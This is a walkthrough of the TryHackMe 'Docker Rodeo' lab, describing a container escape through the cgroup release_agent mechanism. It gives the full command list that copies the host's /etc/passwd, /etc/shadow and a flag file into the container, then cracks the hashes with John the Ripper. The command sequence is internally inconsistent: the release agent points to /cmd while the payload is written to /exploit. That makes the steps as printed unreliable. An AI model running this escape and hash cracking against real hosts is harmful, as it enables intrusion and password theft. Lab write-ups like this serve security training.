We covered the fifth part of exploiting Docker containers. We discussed one of the popular methods of escaping Docker containers, that is, exploiting misconfigured permissions, namely, Linux capabilities granted to Dockers. Using this method we can mount specific sensitive files and hashes from the host file system to a directory of our choice on the Docker container. This was part of TryHackMe The Docker Rodeo.

Summary of the Container Escape Method

The core of this method lies in exploiting Linux capabilities that might be granted to a Docker container. Normally, Docker containers operate in a user mode and rely on the Docker engine to interact with the host operating system. However, if a container is given certain Linux capabilities, it can run in a privileged or root mode, allowing it to directly interact with the host OS kernel without needing the Docker engine.

My goal was to mount files from the host file system into the container. This would allow me to read sensitive files like /etc/passwd or /etc/shadow directly from the host machine.

The exploitation process primarily uses Cgroups (Control Groups) to interact with the host OS. I executed a series of commands to:

  • Create a Cgroup directory.
  • Define a path within the container that would be used to mount files from the host.
  • Create an exploit script within this path. This script contained commands to copy desired files from the host to a location accessible within the container.
  • The crucial part of the exploit was dumping the contents of host files (like /etc/passwd, /etc/shadow, or a flag file) into files within the container’s designated path.
  • Finally, I made the exploit script executable and ran it.

After successfully executing the exploit, the contents of the targeted host files became available within the container. For instance, I was able to retrieve the /etc/passwd and /etc/shadow files from the host.

With access to the shadow file, the next logical step would be to crack the password hashes (for example, using tools like John the Ripper or Hashcat) to gain access to user accounts on the host system, thereby fully escaping the container.

Technical Commands Used in the Terminal

Here are the technical commands I used during the demonstration:

  • id: To check the current user ID within the container.
  • ls /: To list the contents of the root directory of the container.
  • cat /.dockerenv: To confirm being inside a Docker container by checking for the .dockerenv file.
  • capsh --print: To print the current capabilities of the Docker container.
  • capsh --print | grep admin: To specifically search for capabilities containing “admin”.
  • mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x: Creates directories for Cgroup and mounts it.
  • ls -la /tmp | grep cgroup: To verify the creation of the Cgroup directory.
  • echo 1 > /tmp/cgrp/x/notify_on_release: Configures notification on release for the Cgroup.
  • host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab): Gets the host path and assigns it to the host_path variable.
  • echo "$host_path/cmd" > /tmp/cgrp/release_agent: Sets the release agent for the Cgroup to a script named cmd in the host path.
  • echo '#!/bin/sh' > /cmd: Creates a script named cmd and adds the shebang.
  • echo "cat /etc/passwd > $host_path/password.txt" >> /exploit: Appends a command to the exploit script to copy the host’s /etc/passwd file to password.txt in the container’s mounted path.
  • echo "cat /root/flag.txt > $host_path/flag.txt" >> /exploit: Appends a command to copy the flag file.
  • cat /exploit: To display the contents of the exploit script.
  • chmod a+x /exploit: Makes the exploit script executable.
  • sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs": Triggers the release agent.
  • pwd: Print working directory.
  • ls -la: List directory contents in long format, including hidden files.
  • cat flag.txt: Displays the content of flag.txt.
  • cat password.txt: Displays the content of password.txt.
  • cd /home: Change directory to /home.
  • ls -a: List all files, including hidden ones.
  • rm /exploit: Removes the existing exploit script.
  • echo '#!/bin/sh' > /exploit: Recreates the exploit script with shebang.
  • echo "cat /etc/shadow > $host_path/hashes.txt" >> /exploit: Appends command to copy /etc/shadow to hashes.txt.
  • chmod a+x /exploit: Makes the new exploit script executable.
  • sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs": Triggers the release agent again.
  • cat hashes.txt: Displays the content of hashes.txt.
  • nano hashes: Opens the hashes file in the nano editor (on the attacker’s machine, not in the container).
  • john --wordlist=/usr/share/wordlists/rockyou.txt hashes: Attempts to crack the hashes using John the Ripper with the rockyou wordlist (on the attacker’s machine).
  • cd /usr/share/wordlists: Navigates to the wordlists directory (on the attacker’s machine).

This detailed explanation covers the method and the specific commands I used to demonstrate how to escape a Docker container by exploiting misconfigured Linux capabilities.

Room Answers

Does Docker run on a Hypervisor? (Yay/Nay)
What is the port number of the 2nd Docker registry?
 

What is the name of the repository within this registry?

 

What is the name of the tag that has been published?

 

What is the Username in the database configuration?

 

What is the Password in the database configuration?

What is the “IMAGE_ID” for the “challenge” Docker image that you just downloaded?
 

Using Dive, how many “Layers” are there in this image?

 

What user is successfully added?

Contents of “flag.txt” from the host operating system
 

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles